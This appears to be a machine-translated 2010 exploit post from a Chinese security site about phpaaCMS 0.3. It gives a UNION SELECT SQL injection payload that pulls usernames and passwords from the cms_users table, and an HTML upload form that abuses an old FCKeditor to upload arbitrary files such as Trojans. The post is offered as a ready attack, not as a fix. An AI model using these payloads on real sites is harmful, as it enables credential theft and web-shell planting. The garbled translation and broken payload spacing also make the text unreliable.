phpaaCMS V0. 3 the presence of injection vulnerabilities-vulnerability warning-the black bar safety net

ID MYHACK58:62201026572
Type myhack58
Reporter 佚名
Modified 2010-03-28T00:00:00


H4ckx7's Blog

Accidentally passing a php the station, due to the own very little of PHP with the Institute to sloppy looked at is phpaaCMS, not large-scale CMS, habitual later added a“'”, I did not expect the explosion wrong!

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\" at line 1

//You have in your SQL syntax error, check the manual that corresponds to your MySQL syntax correct to use the server version near'\ "line 1

Haha now that the proof is wrong, it should be on the game, continue to guess the field order by, the result field is 1 5, but don't know the database, a sloppy go look at the official discovery database is cms_cms_users in field 3 and 1 1 respectively be the username and password

The draw statement is: & %2 0 1=2%20union%20select%201,2,username,4,5,6,7,8,9,1 0,password,1 2,1 3,1 4,1 5%20from%20cms_users

Look at the reader side also there is this:


<,2,username,4,5,6,7,8,9,1 0,password,1 2,1 3,1 4,1 5%20from%20cms_users>

Exploit 2:

Go backstage after a php Fckeditor editor to version 2. 4. 2 following it.


<form id="frmUpload" enctype="multipart/form-data" action="<>" method="post">Upload a new file:<br> <input type="file" name="NewFile" size="5 0"><br> <input id="btnUpload" type="submit" value="Upload"> </form>

You can upload any format of Trojans into it, tragedy!

By H4ckx7